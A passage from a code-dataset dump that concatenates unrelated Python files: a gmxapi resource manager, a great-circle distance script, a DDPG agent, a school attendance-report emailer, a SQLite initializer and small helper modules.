        execution session is prepared with input and output arguments for the
        wrapped Python callable. Output is publishable only during this session.

    TODO: This functionality should evolve to be a facet of Context implementations.
     There should be no more than one ResourceManager instance per work graph
     node in a Context. This will soon be at odds with letting the ResourceManager
     be owned by an operation instance handle.
    TODO: The publisher and data objects can be more strongly defined through
     interaction between the Context and clients.
    """

    @contextmanager
    def __publishing_context(self):
        """Get a context manager for resolving the data dependencies of this node.

        The returned object is a Python context manager (used to open a `with` block)
        to define the scope in which the operation's output can be published.
        'output' type resources can be published exactly once, and only while the
        publishing context is active. (See operation.function_wrapper())

        Used internally to implement ResourceManager.publishing_resources()

        Responsibilities of the context manager are to:
            * (TODO) Make sure dependencies are resolved.
            * Make sure outputs are marked 'done' when leaving the context.
        """
        # TODO:
        # if self._data.done():
        #     raise exceptions.ProtocolError('Resources have already been published.')
        resource = PublishingDataProxy(weakref.proxy(self))
        # ref: https://docs.python.org/3/library/contextlib.html#contextlib.contextmanager
        try:
            yield resource
        except Exception as e:
            message = 'Uncaught exception while providing output-publishing resources for {}.'.format(self._runner)
            raise exceptions.ApiError(message) from e
        finally:
            # The node is marked "done" whether publication succeeded or not,
            # preventing a second execution attempt (see update_output()).
            self.done = True

    def __init__(self, input_fingerprint=None, runner=None):
        """Initialize a resource manager for the inputs and outputs of an operation.

        Arguments:
            runner : callable to be called once to set output data
            input_fingerprint : Uniquely identifiable input data description
        """
        assert callable(runner)
        assert input_fingerprint is not None
        # Note: This implementation assumes there is one ResourceManager instance per data source,
        # so we only stash the inputs and dependency information for a single set of resources.
        # TODO: validate input_fingerprint as its interface becomes clear.
        self._input_fingerprint = input_fingerprint
        # One Output record per declared output name (closure `output` mapping);
        # each starts not-done with no data.
        self._data = {name: Output(name=name, dtype=dtype, done=False, data=None)
                      for name, dtype in output.items()}
        # TODO: reimplement as a data descriptor
        #  so that Publisher does not need a bound circular reference.
        self._publisher = PublishingDataProxy(weakref.proxy(self))
        # Single-use container: publishing_resources() pops the only element,
        # enforcing at most one publishing session per manager lifetime.
        self.__publishing_resources = [self.__publishing_context()]
        self.done = False
        self._runner = runner
        self.__operation_entrance_counter = 0

    def set_result(self, name, value):
        # Publish a concrete value for the named output, coercing it to the
        # declared dtype of that output.
        if type(value) == list:
            for item in value:
                # In this specification, it is antithetical to publish Futures.
                assert not hasattr(item, 'result')
        self._data[name] = Output(name=name,
                                  dtype=self._data[name].dtype,
                                  done=True,
                                  data=self._data[name].dtype(value))

    def update_output(self):
        """Bring the output of the bound operation up to date.

        Execute the bound operation once if and only if it has not
        yet been run in the lifetime of this resource manager.

        Used internally to implement Futures for the local operation
        associated with this resource manager.

        TODO: We need a different implementation for an operation whose output
         is served by multiple resource managers. E.g. an operation whose output
         is available across the ensemble, but which should only be executed on
         a single ensemble member.
        """
        # This code is not intended to be reentrant. We make a modest attempt to
        # catch unexpected reentrance, but this is not (yet) intended to be a thread-safe
        # resource manager implementation.
        if not self.done:
            self.__operation_entrance_counter += 1
            if self.__operation_entrance_counter > 1:
                raise exceptions.ProtocolError('Bug detected: resource manager tried to execute operation twice.')
            if not self.done:
                with self.local_input() as input:
                    # Note: Resources are marked "done" by the resource manager
                    # when the following context manager completes.
                    # TODO: Allow both structured and singular output.
                    #  For simple functions, just capture and publish the return value.
                    with self.publishing_resources() as output:
                        self._runner(*input.args, output=output, **input.kwargs)

    def future(self, name: str = None, dtype=None):
        """Retrieve a Future for a named output.

        TODO: (FR5+) Normalize this part of the interface between operation definitions and
         resource managers.
        """
        if not isinstance(name, str) or name not in self._data:
            raise exceptions.ValueError('"name" argument must name an output.')
        assert dtype is not None
        if dtype != self._data[name].dtype:
            message = 'Requested Future of type {} is not compatible with available type {}.'
            message = message.format(dtype, self._data[name].dtype)
            raise exceptions.ApiError(message)
        return Future(self, name, dtype)

    def data(self):
        """Get an adapter to the output resources to access results."""
        return OutputDataProxy(self)

    @contextmanager
    def local_input(self):
        """In an API session, get a handle to fully resolved locally available input data.

        Execution dependencies are resolved on creation of the context manager. Input data
        becomes available in the ``as`` object when entering the context manager, which
        becomes invalid after exiting the context manager. Resources allocated to hold the
        input data may be released when exiting the context manager.

        It is left as an implementation detail whether the context manager is reusable and
        under what circumstances one may be obtained.
        """
        # Localize data: fire each dependency's resolution callback first.
        for dependency in self._dependencies:
            dependency()
        # TODO: (FR3+) be more rigorous.
        #  This should probably also use a sort of Context-based observer pattern rather than
        #  the result() method, which is explicitly for moving data across the API boundary.
        args = []
        try:
            for arg in self._input_fingerprint.args:
                # Anything with a result() method is treated as a Future to resolve.
                if hasattr(arg, 'result'):
                    args.append(arg.result())
                else:
                    args.append(arg)
        except Exception as E:
            raise exceptions.ApiError('input_fingerprint not iterating on "args" attr as expected.') from E
        kwargs = {}
        try:
            for key, value in self._input_fingerprint.kwargs.items():
                if hasattr(value, 'result'):
                    kwargs[key] = value.result()
                else:
                    kwargs[key] = value
                # A list value may contain Futures; resolve them element-wise.
                if isinstance(kwargs[key], list):
                    new_list = []
                    for item in kwargs[key]:
                        if hasattr(item, 'result'):
                            new_list.append(item.result())
                        else:
                            new_list.append(item)
                    kwargs[key] = new_list
                try:
                    for item in kwargs[key]:
                        # TODO: This should not happen. Need proper tools for NDArray Futures.
                        # assert not hasattr(item, 'result')
                        if hasattr(item, 'result'):
                            # NOTE(review): indexing the container by the element
                            # itself (kwargs[key][item]) looks suspect; positional
                            # replacement was presumably intended — confirm.
                            kwargs[key][item] = item.result()
                except TypeError:
                    # This is only a test for iterables
                    pass
        except Exception as E:
            raise exceptions.ApiError('input_fingerprint not iterating on "kwargs" attr as expected.') from E
        assert 'input' not in kwargs
        # Sanity check: a 'command' list must not contain unresolved Futures.
        for key, value in kwargs.items():
            if key == 'command':
                if type(value) == list:
                    for item in value:
                        assert not hasattr(item, 'result')
        input_pack = collections.namedtuple('InputPack', ('args', 'kwargs'))(args, kwargs)
        # Prepare input data structure
        yield input_pack

    def publishing_resources(self):
        """Get a context manager for resolving the data dependencies of this node.

        Use the returned object as a Python context manager.
        'output' type resources can be published exactly once, and only while the
        publishing context is active.

        Write access to publishing resources can be granted exactly once during the
        resource manager lifetime and conveys exclusive access.
        """
        return self.__publishing_resources.pop()

    ###
    # TODO: Need a facility to resolve inputs, chasing dependencies...
    ###
    @property
    def _dependencies(self):
        """Generate a sequence of call-backs that notify of the need to satisfy dependencies."""
        for arg in self._input_fingerprint.args:
            if hasattr(arg, 'result') and callable(arg.result):
                yield arg.result
        for _, arg in self._input_fingerprint.kwargs.items():
            if hasattr(arg, 'result') and callable(arg.result):
                yield arg.result
        for item in self._input_fingerprint.dependencies:
            assert hasattr(item, 'run')
            yield item.run
def decorator(function):
    # The wrapped function is replaced by `factory`: calling it builds an
    # Operation work-graph node instead of executing `function` immediately.
    @functools.wraps(function)
    def factory(**kwargs):
        def get_resource_manager(instance):
            """Provide a reference to a resource manager for the dynamically defined Operation.

            Initial Operation implementation must own ResourceManager. As more formal Context is
            developed, this can be changed to a weak reference. A distinction can also be developed
            between the facet of the Context-level resource manager to which the Operation has access
            and the whole of the managed resources.
            """
            return ResourceManager(input_fingerprint=instance._input, runner=function)

        class Operation(object):
            """Dynamically defined Operation implementation.

            Define a gmxapi Operation for the functionality being wrapped by the enclosing code.
            """
            # Inspected once per factory invocation; used to validate that
            # provided keyword arguments match the wrapped function's parameters.
            signature = inspect.signature(function)

            def __init__(self, **kwargs):
                """Initialization defines the unique input requirements of a work graph node.

                Initialization parameters map to the parameters of the wrapped function with
                addition(s) to support gmxapi data flow and deferred execution.

                If provided, an ``input`` keyword argument is interpreted as a parameter pack
                of base input. Inputs also present as standalone keyword arguments override
                values in ``input``.

                Inputs that are handles to gmxapi operations or outputs induce data flow
                dependencies that the framework promises to satisfy before the Operation
                executes and produces output.
                """
                #
                # Define the unique identity and data flow constraints of this work graph node.
                #
                # TODO: (FR4) generalize
                input_dependencies = []

                # TODO: Make allowed input strongly specified in the Operation definition.
                # TODO: Resolve execution dependencies at run() and make non-data
                #  execution `dependencies` just another input that takes the default
                #  output of an operation and doesn't do anything with it.

                # If present, kwargs['input'] is treated as an input "pack" providing _default_ values.
                input_kwargs = {}
                if 'input' in kwargs:
                    provided_input = kwargs.pop('input')
                    if provided_input is not None:
                        # Try to determine what 'input' is.
                        # TODO: (FR5+) handling should be related to Context.
                        #  The process of accepting input arguments includes resolving placement in
                        #  a work graph and resolving the Context responsibilities for graph nodes.
                        if hasattr(provided_input, 'run'):
                            # A runnable is an execution dependency, not data.
                            input_dependencies.append(provided_input)
                        else:
                            # Assume a parameter pack is provided.
                            for key, value in provided_input.items():
                                input_kwargs[key] = value
                assert 'input' not in kwargs
                assert 'input' not in input_kwargs

                # Merge kwargs and kwargs['input'] (keyword parameters versus parameter pack)
                for key in kwargs:
                    if key in self.signature.parameters:
                        input_kwargs[key] = kwargs[key]
                    else:
                        raise exceptions.UsageError('Unexpected keyword argument: {}'.format(key))

                # TODO: (FR4) Check input types
                self.__input = PyFuncInput(args=[],
                                           kwargs=input_kwargs,
                                           dependencies=input_dependencies)

                # TODO: (FR5+) Split the definition of the resource structure
                #  and the resource initialization.
                #  Resource structure definition logic can be moved to the level
                #  of the class definition. We need knowledge of the inputs to
                #  uniquely identify the resources for this operation instance.
                #  Implementation suggestion: Context-provided metaclass defines
                #  resource manager interface for this Operation. Factory function
                #  initializes compartmentalized resource management at object creation.
                self.__resource_manager = get_resource_manager(self)

            @property
            def _input(self):
                """Internal interface to support data flow and execution management."""
                return self.__input

            @property
            def output(self):
                # Note: if we define Operation classes exclusively in the scope
                # of Context instances, we could elegantly have a single _resource_manager
                # handle instance per Operation type per Context instance.
                # That could make it easier to implement library-level optimizations
                # for managing hardware resources or data placement for operations
                # implemented in the same librarary. That would be well in the future,
                # though, and could also be accomplished with other means,
                # so here I'm assuming one resource manager handle instance
                # per Operation handle instance.
                #
                # TODO: Allow both structured and singular output.
                #  Either return self._resource_manager.data or self._resource_manager.data.output
                # TODO: We can configure `output` as a data descriptor
                #  instead of a property so that we can get more information
                #  from the class attribute before creating an instance.
                #  The C++ equivalence would probably be a templated free function for examining traits.
                return self.__resource_manager.data()

            def run(self):
                """Make a single attempt to resolve data flow conditions.

                This is a public method, but should not need to be called by users. Instead,
                just use the `output` data proxy for result handles, or force data flow to be
                resolved with the `result` methods on the result handles.

                `run()` may be useful to try to trigger computation (such as for remotely
                dispatched work) without retrieving results locally right away.

                `run()` is also useful internally as a facade to the Context implementation details
                that allow `result()` calls to ask for their data dependencies to be resolved.
                Typically, `run()` will cause results to be published to subscribing operations as
                they are calculated, so the `run()` hook allows execution dependency to be slightly
                decoupled from data dependency, as well as to allow some optimizations or to allow
                data flow to be resolved opportunistically. `result()` should not call `run()`
                directly, but should cause the resource manager / Context implementation to process
                the data flow graph.

                In one conception, `run()` can have a return value that supports control flow
                by itself being either runnable or not. The idea would be to support
                fault tolerance, implementations that require multiple iterations / triggers
                to complete, or looping operations.
                """
                self.__resource_manager.update_output()

        operation = Operation(**kwargs)
        return operation

    return factory
return decorator
| StarcoderdataPython |
# The great circle distance is the distance between two points on the surface
# of a sphere. Let (x1, y1) and (x2, y2) be the geographical latitude and
# longitude of two points. The great circle distance between the two points is:
#     d = radius * arccos(sin(x1) * sin(x2) + cos(x1) * cos(x2) * cos(y1 - y2))
# ___________________________________________________________________________________________________________
# This program prompts the user to enter the latitude and longitude of two
# points on the earth in degrees and displays their great circle distance.
import math


def great_circle_distance(lat1, lon1, lat2, lon2, radius=6371.01):
    """Return the great circle distance between two points on a sphere.

    The points are geographical latitude/longitude pairs in degrees.
    ``radius`` defaults to the Earth's average radius in kilometers; pass a
    different value to generalize to other spheres or units.
    """
    x1, y1, x2, y2 = (math.radians(v) for v in (lat1, lon1, lat2, lon2))
    central_angle = math.acos(
        math.sin(x1) * math.sin(x2)
        + math.cos(x1) * math.cos(x2) * math.cos(y1 - y2)
    )
    return radius * central_angle


if __name__ == '__main__':
    # FIX: the original used eval(input(...)), which executes arbitrary user
    # input (a code-injection hazard). Parse comma-separated floats instead.
    x1, y1 = (float(v) for v in
              input("Enter point 1 (latitude and longitude) in degrees: ").split(","))
    x2, y2 = (float(v) for v in
              input("Enter point 2 (latitude and longitude) in degrees: ").split(","))
    # Example input: 41.5,87.37
    print("The distance between the two points is: ",
          great_circle_distance(x1, y1, x2, y2), "Km")
| StarcoderdataPython |
1655361 | <reponame>kswann-mck/udacity_drl_p3
"""
This script is the agent implementation of a Deep Deterministic Policy Gradient agent on the Unity Reacher environment. The base model, agent
and training function were taken from the solution here:
https://github.com/udacity/deep-reinforcement-learning/tree/master/ddpg-pendulum.
It was modified to include parameters to make training with different hyperparamter options easier.
"""
import numpy as np
import random
import copy
from collections import namedtuple, deque
from model import Actor, Critic
import torch
import torch.nn.functional as F
import torch.optim as optim
# Select the compute device once at import time: the first CUDA GPU when
# available, otherwise the CPU. Used for all tensor transfers in this module.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
    """DDPG agent that interacts with and learns from the environment.

    Maintains local/target actor and critic networks, an Ornstein-Uhlenbeck
    noise process for exploration (scaled by a decaying epsilon), and an
    experience replay buffer.
    """

    def __init__(self,
                 state_size=33,
                 action_size=4,
                 eps_start=1.0,
                 eps_end=0.01,
                 eps_decay=0.995,
                 buffer_size=1e6,
                 batch_size=256,
                 update_every=20,
                 update_times=1,
                 actor_fc1_units=400,
                 actor_fc2_units=300,
                 critic_fc1_units=256,
                 critic_fc2_units=128,
                 actor_lr=1e-3,
                 critic_lr=1e-3,
                 gamma=0.99,
                 tau=1e-3,
                 weight_decay=0,
                 noise_theta=0.15,
                 noise_sigma=0.20,
                 random_seed=2
                 ):
        """Initialize an Agent object.

        Parameters
        ----------
        state_size: size of the state representation vector.
        action_size: size of the action space.
        eps_start: float, starting value of epsilon used to scale the noise
        eps_end: float, the minimum value of epsilon
        eps_decay: float, multiplicative decay applied to epsilon per noisy action
        buffer_size: size of the experience replay buffer
        batch_size: int, batch size used for gradient descent when learning
        update_every: int, interval of timesteps at which learning occurs
        update_times: number of learning passes per update
        actor_fc1_units: int, neurons in the actor network's first hidden layer
        actor_fc2_units: int, neurons in the actor network's second hidden layer
        critic_fc1_units: int, neurons in the critic network's first hidden layer
        critic_fc2_units: int, neurons in the critic network's second hidden layer
        actor_lr: float, learning rate for the actor optimizer
        critic_lr: float, learning rate for the critic optimizer
        gamma: float, reward discount factor used in updates
        tau: float, interpolation parameter for the soft target update
        weight_decay: weight decay for the critic's Adam optimizer
        noise_theta: theta of the Ornstein-Uhlenbeck noise process
        noise_sigma: sigma of the Ornstein-Uhlenbeck noise process
        random_seed: random seed used for consistency
        """
        self.state_size = state_size
        self.action_size = action_size
        self.eps_start = eps_start
        self.eps = self.eps_start
        self.eps_decay = eps_decay
        self.eps_end = eps_end
        self.buffer_size = int(buffer_size)
        self.batch_size = int(batch_size)
        self.update_every = update_every
        self.update_times = update_times
        self.gamma = gamma
        self.tau = tau
        self.t_step = 0
        self.noise_mu = 0
        self.seed = random.seed(random_seed)

        # Actor Network (w/ Target Network)
        self.actor_local = Actor(state_size, action_size, random_seed, actor_fc1_units, actor_fc2_units).to(device)
        self.actor_target = Actor(state_size, action_size, random_seed, actor_fc1_units, actor_fc2_units).to(device)
        self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=actor_lr)

        # Critic Network (w/ Target Network)
        self.critic_local = Critic(state_size, action_size, random_seed, critic_fc1_units, critic_fc2_units).to(device)
        self.critic_target = Critic(state_size, action_size, random_seed, critic_fc1_units, critic_fc2_units).to(device)
        self.critic_optimizer = optim.Adam(self.critic_local.parameters(), lr=critic_lr, weight_decay=weight_decay)

        # Noise process
        self.noise = OUNoise(action_size, random_seed, self.noise_mu, noise_theta, noise_sigma)

        # Replay memory.
        # FIX: pass the int-cast sizes; ReplayBuffer stores batch_size as
        # given and random.sample() requires an integer k, so forwarding a
        # float (e.g. the 1e6 default) would break sampling.
        self.memory = ReplayBuffer(action_size, random_seed, self.buffer_size, self.batch_size)

    def step(self, state, action, reward, next_state, done):
        """Save an experience in replay memory and learn on the update schedule."""
        self.memory.add(state, action, reward, next_state, done)
        self.t_step = (self.t_step + 1) % self.update_every
        # Learn, if enough samples are available in memory
        if len(self.memory) > self.batch_size and self.t_step == 0:
            for i in range(self.update_times):
                experiences = self.memory.sample()
                self.learn(experiences, self.gamma)

    def act(self, state, add_noise=True):
        """Return a clipped action for the given state per the current policy."""
        state = torch.from_numpy(state).float().to(device)
        self.actor_local.eval()
        with torch.no_grad():
            action = self.actor_local(state).cpu().data.numpy()
        self.actor_local.train()
        if add_noise:
            # Scale exploration noise by epsilon, floored at eps_end.
            action += max(self.eps, self.eps_end) * self.noise.sample()
            # BUG FIX: the original assigned the decayed value to
            # `self.epsilon`, an attribute that is never read, so the noise
            # scale never actually decayed. Decay `self.eps` itself.
            self.eps = self.eps * self.eps_decay
        return np.clip(action, -1, 1)

    def reset(self):
        """Reset the noise process (call at the start of each episode)."""
        self.noise.reset()

    def learn(self, experiences, gamma):
        """Update policy and value parameters using a batch of experience tuples.

        Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
        where:
            actor_target(state) -> action
            critic_target(state, action) -> Q-value

        Params
        ======
            experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
            gamma (float): discount factor
        """
        states, actions, rewards, next_states, dones = experiences

        # ---------------------------- update critic ---------------------------- #
        # Get predicted next-state actions and Q values from target models
        actions_next = self.actor_target(next_states)
        Q_targets_next = self.critic_target(next_states, actions_next)
        # Compute Q targets for current states (y_i)
        Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
        # Compute critic loss
        Q_expected = self.critic_local(states, actions)
        critic_loss = F.mse_loss(Q_expected, Q_targets)
        # Minimize the loss
        self.critic_optimizer.zero_grad()
        critic_loss.backward()
        # FIX: clip_grad_norm is deprecated (removed in newer PyTorch);
        # use the in-place clip_grad_norm_.
        torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
        self.critic_optimizer.step()

        # ---------------------------- update actor ---------------------------- #
        # Compute actor loss
        actions_pred = self.actor_local(states)
        actor_loss = -self.critic_local(states, actions_pred).mean()
        # Minimize the loss
        self.actor_optimizer.zero_grad()
        actor_loss.backward()
        self.actor_optimizer.step()

        # ----------------------- update target networks ----------------------- #
        self.soft_update(self.critic_local, self.critic_target, self.tau)
        self.soft_update(self.actor_local, self.actor_target, self.tau)

    def soft_update(self, local_model, target_model, tau):
        """Soft update model parameters: θ_target = τ*θ_local + (1 - τ)*θ_target.

        Params
        ======
            local_model: PyTorch model (weights will be copied from)
            target_model: PyTorch model (weights will be copied to)
            tau (float): interpolation parameter
        """
        for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
            target_param.data.copy_(tau * local_param.data + (1.0 - tau) * target_param.data)
class OUNoise:
    """Ornstein-Uhlenbeck process for temporally correlated exploration noise."""

    def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):
        """Initialize parameters and noise process.

        size: dimensionality of the noise vector
        seed: seed for the (global) `random` module RNG
        mu: long-running mean of the process
        theta: mean-reversion rate
        sigma: scale of the random perturbation
        """
        self.mu = mu * np.ones(size)
        self.theta = theta
        self.sigma = sigma
        self.seed = random.seed(seed)
        self.reset()

    def reset(self):
        """Reset the internal state (= noise) to mean (mu)."""
        self.state = copy.copy(self.mu)

    def sample(self):
        """Update internal state and return it as a noise sample."""
        x = self.state
        # BUG FIX: the original used random.random(), i.e. uniform samples on
        # [0, 1), which biases the noise upward by sigma/2. The
        # Ornstein-Uhlenbeck process is defined with zero-mean Gaussian
        # increments; random.gauss keeps the same seeded RNG.
        dx = self.theta * (self.mu - x) + self.sigma * np.array([random.gauss(0.0, 1.0) for i in range(len(x))])
        self.state = x + dx
        return self.state
class ReplayBuffer:
    """Fixed-size buffer that stores experience tuples for replay sampling."""

    def __init__(self, action_size, seed, buffer_size, batch_size):
        """Initialize a ReplayBuffer object.

        Params
        ======
            buffer_size (int): maximum size of buffer
            batch_size (int): size of each training batch
        """
        print(f"Replay Buffer Size: {buffer_size}, Batch Size: {batch_size}")
        self.action_size = action_size
        self.batch_size = batch_size
        # Oldest experiences are evicted automatically once capacity is hit.
        self.memory = deque(maxlen=int(buffer_size))
        self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
        self.seed = random.seed(seed)

    def add(self, state, action, reward, next_state, done):
        """Add a new experience to memory."""
        self.memory.append(self.experience(state, action, reward, next_state, done))

    def sample(self):
        """Randomly sample a batch of experiences and stack them as tensors."""
        batch = random.sample(self.memory, k=self.batch_size)
        valid = [entry for entry in batch if entry is not None]
        states = torch.from_numpy(np.vstack([entry.state for entry in valid])).float().to(device)
        actions = torch.from_numpy(np.vstack([entry.action for entry in valid])).float().to(device)
        rewards = torch.from_numpy(np.vstack([entry.reward for entry in valid])).float().to(device)
        next_states = torch.from_numpy(np.vstack([entry.next_state for entry in valid])).float().to(device)
        dones = torch.from_numpy(np.vstack([entry.done for entry in valid]).astype(np.uint8)).float().to(device)
        return (states, actions, rewards, next_states, dones)

    def __len__(self):
        """Return the current size of internal memory."""
        return len(self.memory)
8138286 | <reponame>tophermckee/python_lca_data
import sys
sys.path.append("..")
from util.utilities import *
# Configure module-wide logging: INFO level, timestamped messages, written to
# a log file named after this script under ../logs (truncated on each run).
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    datefmt='%B-%d-%Y %H:%M:%S',
    filename=f"../logs/{Path(__file__).stem}.log",
    filemode='w'
)
def send_attendance_discrepancies():
    """Email a report of students present at Pack Time but absent for Period 1.

    Pulls today's class absences from the student-records API, builds a
    per-student record of the Pack Time (PT) and Period 1 (P1) attendance
    codes (defaulting both to "Present"), and emails an HTML table of
    students who were in school for Pack Time but out of school for
    Period 1. Only runs on school days; failures are logged rather than
    raised so a scheduled run never crashes.
    """
    today = datetime.datetime.now().strftime('%Y-%m-%d')

    # Email template with a ###table_data### placeholder for the rows.
    with open('../html/discrepancy_email.html', 'r') as f:
        html_email = f.read()

    class_absences = sr_api_pull(
        'class-absences',
        parameters = {
            'school_ids': 15,
            'min_date': today,
            'max_date': today,
            'expand': 'absence_type,section_period.period,student,section_period.staff_member,section_period.section.course_definition'
        }
    )

    database = {}

    try:
        if today_is_a_school_day():
            for absence in class_absences:
                # First sighting of a student: default both periods to Present.
                if absence['student_id'] not in database.keys():
                    database[absence['student_id']] = {'name': f"{absence['student']['first_name']} {absence['student']['last_name']}", 'period1': {'in_school': '1', 'staffer': '', 'code': 'Present'}, 'pack_time': {'in_school': '1', 'staffer': '', 'code': 'Present'}}
                if absence['section_period']['period']['display_name'] == 'PT':
                    database[absence['student_id']]['pack_time'] = {'code': absence['absence_type']['name'], 'in_school': absence['absence_type']['in_school'], 'staffer': absence['section_period']['staff_member']['display_name']}
                if absence['section_period']['period']['display_name'] == 'P1':
                    database[absence['student_id']]['period1'] = {'code': absence['absence_type']['name'], 'in_school': absence['absence_type']['in_school'], 'staffer': absence['section_period']['staff_member']['display_name']}

            table_data = ''
            for student in database:
                # Discrepancy: in school at Pack Time, out of school Period 1.
                if (database[student]['pack_time']['in_school'] == '1') and (database[student]['period1']['in_school'] == '0'):
                    table_data += f"<tr><td>{database[student]['name']}</td><td>{database[student]['pack_time']['code']}</td><td>{database[student]['period1']['code']}</td></tr>"

            send_email('<EMAIL>', '', f"{today} Attendance Discrepancies", html_email.replace('###table_data###', table_data))
    except Exception as error:
        # FIX: the original silently swallowed every error (`pass`), hiding
        # API or template failures. Keep the best-effort behavior but record
        # why the run failed.
        logging.exception("Failed to send attendance discrepancies: %s", error)


if __name__ == '__main__':
    send_attendance_discrepancies()
1996227 | <reponame>ytyaru0/GitHub.Uploader.Pi3.Https.201802220700
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractmethod
import os.path
import setting.Setting
# Abstract base class for database initializers.
class DbInitializer(metaclass=ABCMeta):
    """Create and populate one SQLite database for a GitHub tool.

    Subclasses are named ``<DbId>DbInitializer``; the ``DbId`` prefix selects
    the database file name (``GitHub.<DbId>.sqlite3``) and the directory that
    holds the subclass's ``sql/create`` DDL scripts and ``tsv`` seed files.

    NOTE(review): the original code referenced ``dataset`` and ``glob``
    without importing them, used undefined names (``dbname``, ``table_name``,
    ``self.__dbs``) and carried a large dead-code block; this revision repairs
    those and drops the debug prints while keeping the public interface
    (``Initialize``, ``CreateDb``, ``ConnectDb``, ``CreateTable``,
    ``InsertInitData`` and the ``DbId``/``DbFileName``/``DbFilePath``
    properties) unchanged.
    """
    def __init__(self):
        # Repository root: four directory levels above this module (kept for
        # interface compatibility even though it is currently unused).
        self.__path_dir_root = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
        self.__setting = setting.Setting.Setting()
        self.__path_dir_this = os.path.abspath(os.path.dirname(__file__))
        self.__db = None

    def Initialize(self):
        """Ensure the DB file exists, connect, and (for a new file) build it.

        Returns the open ``dataset`` connection. Tables are created and seed
        data inserted only when the database file did not exist yet.
        """
        import dataset  # third-party; the original code already required it at call time

        is_new = not os.path.isfile(self.DbFilePath)
        if is_new:
            # Create an empty file so SQLite can open it.
            with open(self.DbFilePath, 'w') as f:
                pass
        db = dataset.connect('sqlite:///' + self.DbFilePath)
        self.__db = db
        if is_new:
            db.query('PRAGMA foreign_keys = false')
            # Create tables (CREATE TABLE statements).
            for path_sql in self.__GetCreateTableSqlFilePaths():
                self.__ExecuteSqlFile(path_sql)
            # Insert initial values from the TSV seed files.
            for path_tsv in self.__GetInsertTsvFilePaths():
                table_name = os.path.splitext(os.path.basename(path_tsv))[0]
                # NOTE(review): ``database.TsvLoader`` is not imported in this
                # module in the original source — confirm the correct import.
                loader = database.TsvLoader.TsvLoader()
                loader.ToSqlite3(path_tsv, self.DbFilePath, table_name)
            db.query('PRAGMA foreign_keys = true')
        return db

    def CreateDb(self):
        """Create an empty database file if it does not already exist."""
        if not os.path.isfile(self.DbFilePath):
            with open(self.DbFilePath, 'w') as f:
                pass

    def ConnectDb(self):
        """Open a connection and publish it as the class attribute ``Db``."""
        import dataset
        self.__class__.Db = dataset.connect('sqlite:///' + self.DbFilePath)

    def CreateTable(self):
        """Run every CREATE TABLE script for this database.

        Requires a prior ``Initialize`` call (uses the stored connection).
        """
        self.__db.query('PRAGMA foreign_keys = false')
        for path_sql in self.__GetCreateTableSqlFilePaths():
            self.__ExecuteSqlFile(path_sql)

    def InsertInitData(self):
        """Load every TSV seed file into its same-named table.

        Requires a prior ``Initialize`` call (uses the stored connection).
        """
        for path_tsv in self.__GetInsertTsvFilePaths():
            table_name = os.path.splitext(os.path.basename(path_tsv))[0]
            # NOTE(review): see Initialize — ``database.TsvLoader`` import is
            # unresolved in the original module.
            loader = database.TsvLoader.TsvLoader()
            loader.ToSqlite3(path_tsv, self.DbFilePath, table_name)
        self.__db.query('PRAGMA foreign_keys = true')

    @property
    def DbId(self):
        """Subclass-specific identifier: the class name minus 'DbInitializer'."""
        # Original used ``super().__thisclass__.__name__``; this is equivalent
        # and clearer.
        return self.__class__.__name__.replace(DbInitializer.__name__, '')

    @property
    def DbFileName(self):
        """Database file name derived from the subclass identifier."""
        return 'GitHub.' + self.DbId + '.sqlite3'

    @property
    def DbFilePath(self):
        """Absolute path of the database file under the configured DB directory."""
        return os.path.join(self.__setting.DbPath, self.DbFileName)

    # Path discovery: CREATE TABLE *.sql scripts for this DbId.
    def __GetCreateTableSqlFilePaths(self):
        import glob
        path = os.path.join(self.__path_dir_this, self.DbId, 'sql', 'create')
        for path_sql in glob.glob(os.path.join(path + '*.sql')):
            yield path_sql

    # Path discovery: seed-data *.tsv files for this DbId.
    def __GetInsertTsvFilePaths(self):
        import glob
        path = os.path.join(self.__path_dir_this, self.DbId, 'tsv')
        for path_tsv in glob.glob(os.path.join(path + '*.tsv')):
            yield path_tsv

    # Execute one SQL file on the open connection.
    def __ExecuteSqlFile(self, sql_path):
        with open(sql_path, 'r') as f:
            sql = f.read()
        self.__db.query(sql)
| StarcoderdataPython |
3394786 | <filename>tests/load_context.py
def load_context():
    """Prepend the project's ``src`` directory to ``sys.path``.

    Lets modules in the test folder import the code under ``../src``
    relative to this file, as expected.
    """
    import os
    import sys

    here = os.path.dirname(os.path.abspath(__file__))
    src_dir = here + '/../src'
    sys.path.insert(0, src_dir)
| StarcoderdataPython |
9727268 | <gh_stars>0
from .collect_env import collect_env
from .logger import get_root_logger
from .statistictext import StatisticTextLoggerHook
from .print_log import print_defect_metrics, print_defect_loss
from .trainer_hooks import CheckRunstateHook, TrainerLogHook, TrainerCheckpointHook
__all__ = ['get_root_logger', 'collect_env',
'CheckRunstateHook', 'TrainerLogHook', 'TrainerCheckpointHook',
'print_defect_metrics', 'print_defect_loss', 'StatisticTextLoggerHook'] | StarcoderdataPython |
4887720 | import os
from sx.utils import get_package_root
from sx.stubs.settings import Settings
class Environment(object):
    """Collects environment variables and writes them to a package ``.env`` file.

    Used as a context manager: entering resets the collected variables,
    exiting writes ``KEY=VALUE`` lines to ``<package root>/.env``.
    """

    def __init__(self, location, constants={}):
        # NOTE: the mutable default is kept for interface compatibility; the
        # dict is only ever read here, so sharing it across calls is harmless.
        self.__location = location
        self.__constants = constants
        self.__data = {}

    def __add(self, key, value, prefix):
        """Store one variable, optionally namespaced by *prefix*."""
        if prefix is not None:
            key = '{}{}'.format(prefix, key)
        self.__data[key] = value

    def add(self, key, value, prefix=None):
        """Register *value* under *key*.

        ``Settings`` values are resolved first: a known constant key wins,
        otherwise the setting's declared default is used; settings with
        neither are silently skipped. Plain values are stored as-is.
        """
        # isinstance replaces the original ``type(value) == Settings`` so
        # Settings subclasses are handled too.
